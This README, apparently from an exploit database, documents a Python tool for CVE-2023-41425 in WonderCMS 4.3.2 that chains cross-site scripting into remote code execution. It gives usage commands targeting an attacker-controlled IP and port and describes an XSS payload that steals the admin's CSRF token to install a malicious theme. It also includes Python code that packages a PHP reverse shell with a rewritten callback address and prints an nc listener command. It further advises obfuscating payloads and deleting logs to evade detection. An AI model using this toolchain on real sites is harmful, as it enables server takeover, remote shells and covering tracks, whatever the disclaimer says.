Related vulnerability
Description
Automates the creation and hosting of a JavaScript XSS payload that installs a malicious theme module, triggering a reverse shell via remote code execution in WonderCMS. The tool uses PentestMonkey's PHP reverse shell script as the payload.
Introduction
# 🚨 WonderCMS RCE Exploit Tool (CVE-2023-41425)
This Python-based offensive security tool automates the exploitation of **CVE-2023-41425** in **WonderCMS 4.3.2**: a cross-site scripting flaw that the tool chains into **Remote Code Execution (RCE)**. It streamlines the process of crafting a malicious ZIP theme module and delivering a JavaScript-based **XSS payload** that, once executed in an authenticated admin's browser, installs the module and deploys a PHP reverse shell.
> ⚠️ **For educational and authorized security testing purposes only.**
---
## 📚 Table of Contents
- [⚙️ Features](#️-features)
- [📥 Installation & Requirements](#-installation--requirements)
- [🚀 Usage Examples](#-usage-examples)
- [🧾 Argument Reference](#-argument-reference)
- [🧠 Detailed Workflow](#-detailed-workflow)
- [🔐 Security Notes](#-security-notes)
- [📝 License & Attribution](#-license--attribution)
---
## ⚙️ Features
- Generates a weaponized ZIP archive with embedded PHP reverse shell
- Crafts a JavaScript-based XSS payload to hijack admin sessions
- Extracts CSRF tokens and automates the module installation process
- Spins up a local HTTP server to host exploit files
- Compatible with Kali Linux, ParrotOS, and Python 3.6+
---
## 📥 Installation & Requirements
### 🔧 Requirements
- Python **3.6+**
- Linux or macOS (on Windows, run it under WSL; see the usage examples below)
- Tested on Kali Linux
### 📦 Dependencies
The script relies only on Python’s standard library. No external packages required.
### 🛠 Installation
#### UNIX
```bash
wget https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2/archive/refs/heads/main.zip
unzip main.zip
cd CVE-2023-41425-RCE-WonderCMS-4.3.2-main
```
#### Windows
```shell
git clone https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2.git
cd ./CVE-2023-41425-RCE-WonderCMS-4.3.2
```
---
## 🚀 Usage Examples
### 💻 Bash
```bash
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r reverseShell.php
```
### 🪟 PowerShell (WSL recommended)
```powershell
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r ./reverseShell.php
```
---
## 🧾 Argument Reference
| Argument | Required | Description | Default |
|------------------|----------|---------------------------------------------------------------------|-----------------|
| `-u` | ✅ | Target WonderCMS login URL (e.g., `http://target/index.php?...`) | — |
| `-H`, `--host` | ✅ | Attacker’s IP address (for reverse shell) | — |
| `-p` | ✅ | Attacker’s listening port | — |
| `-r`, `--reverse-shell` | ✅ | Path to the PHP reverse shell script | — |
| `--dir-name` | ❌ | Directory inside ZIP theme archive | `TeaOn` |
| `--http-port` | ❌ | Port for local HTTP server | `3000` |
| `--zip-name` | ❌ | Name of the generated ZIP file | `reverse-shell` |
---
## 🧠 Detailed Workflow
Here’s a breakdown of what the script does under the hood:
1. **Argument Parsing**:
- Uses `argparse` to collect required and optional inputs from the attacker.
2. **Reverse Shell Preparation**:
- Reads the provided PHP reverse shell.
- Replaces `$ip` and `$port` placeholders with the supplied `-H` and `-p` values.
3. **Malicious ZIP Creation**:
- Creates a directory structure like: `<dir_name>/<php_reverse_shell.php>`.
- Compresses it into `<zip_name>.zip`.
4. **XSS Payload (`script.js`) Generation**:
- Reads the CSRF token from the DOM of the page the payload executes in, i.e. the admin's authenticated WonderCMS session.
- Constructs the module installation URL pointing at the hosted ZIP.
- Installs the malicious theme; once the uploaded PHP file is reachable under the theme directory, executing it triggers the reverse shell.
5. **Instructions & Exploit Hosting**:
- Outputs the `nc` listener command.
- Shows the full XSS delivery URL.
- Launches a simple HTTP server to host both the ZIP and JS files.
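The following is an added example, not code from this repository, illustrating steps 2, 3 and 5 of the workflow above: rewriting the `$ip`/`$port` lines of a PentestMonkey-style PHP reverse shell, packaging it as `<dir_name>/<file>.php` in a ZIP, and computing the URLs and listener command the tool prints. The PHP template is a constructed stand-in for the head of PentestMonkey's script, and the exact `nc` flags are an assumption (the README only says an `nc` command is printed).

```python
import io
import ipaddress
import re
import zipfile

# Constructed stand-in for the top of PentestMonkey's php-reverse-shell.php.
# Only the two assignment lines the tool rewrites matter here; the real
# script is much longer.
SAMPLE_TEMPLATE = """<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
// ... remainder of the reverse shell omitted in this constructed sample ...
"""


def prepare_reverse_shell(php_src: str, host: str, port: int) -> str:
    """Return php_src with the $ip and $port assignments pointed at host:port.

    Validates the callback address first so a typo does not produce a payload
    that silently calls back to the wrong place, and insists on exactly one
    match per placeholder so an unexpected template is rejected rather than
    half-rewritten."""
    ipaddress.ip_address(host)  # raises ValueError on a malformed address
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    out, n_ip = re.subn(r"^\$ip\s*=\s*'[^']*';", f"$ip = '{host}';", php_src, flags=re.M)
    out, n_port = re.subn(r"^\$port\s*=\s*\d+;", f"$port = {port};", out, flags=re.M)
    if n_ip != 1 or n_port != 1:
        raise ValueError("template must contain exactly one $ip and one $port assignment")
    return out


def build_theme_zip(php_payload: str, dir_name: str = "TeaOn",
                    file_name: str = "reverseShell.php") -> bytes:
    """Package the shell as <dir_name>/<file_name> inside an in-memory ZIP,
    the <dir_name>/<php_reverse_shell.php> layout described in step 3."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{dir_name}/{file_name}", php_payload)
    return buf.getvalue()


def zip_members(zip_bytes: bytes) -> list:
    """List the archive's member paths; used to check the layout before hosting."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.namelist()


def hosted_urls(host: str, http_port: int = 3000, zip_name: str = "reverse-shell") -> dict:
    """URLs at which the tool's local HTTP server (default port 3000) serves
    the ZIP and the script.js payload."""
    base = f"http://{host}:{http_port}"
    return {"zip": f"{base}/{zip_name}.zip", "js": f"{base}/script.js"}


def listener_command(port: int) -> str:
    """Listener to start before delivering the XSS URL (flags are an assumption)."""
    return f"nc -lvnp {port}"


if __name__ == "__main__":
    shell = prepare_reverse_shell(SAMPLE_TEMPLATE, "192.168.0.100", 4444)
    archive = build_theme_zip(shell)
    with open("reverse-shell.zip", "wb") as fh:
        fh.write(archive)
    print(zip_members(archive))
    print(hosted_urls("192.168.0.100"))
    print(listener_command(4444))
```

Run it from the directory you intend to serve with `python3 -m http.server 3000`; `zip_members` should show a single `TeaOn/reverseShell.php` entry, which is what a theme archive must look like for the installed directory name to match `--dir-name`.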
---
## 🔐 Security Notes
- 🧹 **Cleanup**: Always remove generated ZIPs, JS payloads, and HTTP server logs after use.
- 👀 **Detection**: Exploit may be logged by WonderCMS or detected by WAFs.
- 🧪 **Test Responsibly**: Only target systems you are explicitly authorized to test.
- 🔒 **Harden Reverse Shells**: Consider obfuscating or encrypting the PHP payload to evade detection.
---
## 📝 License & Attribution
This tool is provided under the [MIT License](LICENSE).
Crafted with 🔥 by TeaOnHack🧋.
- CVE Reference: [CVE-2023-41425](https://nvd.nist.gov/vuln/detail/CVE-2023-41425)
- WonderCMS: https://www.wondercms.com/
> This project is intended for **educational and authorized security assessments only**. The author is not responsible for any misuse or damage caused by this tool.
File snapshot
[4.0K] /data/pocs/fb30564eaebb8f24cef06dff5354cce8607c2f5c
├── [7.4K] exploit_CVE-2023-41425.py
├── [1.0K] LICENSE
├── [5.0K] README.md
└── [2.6K] reverseShell.php
0 directories, 4 files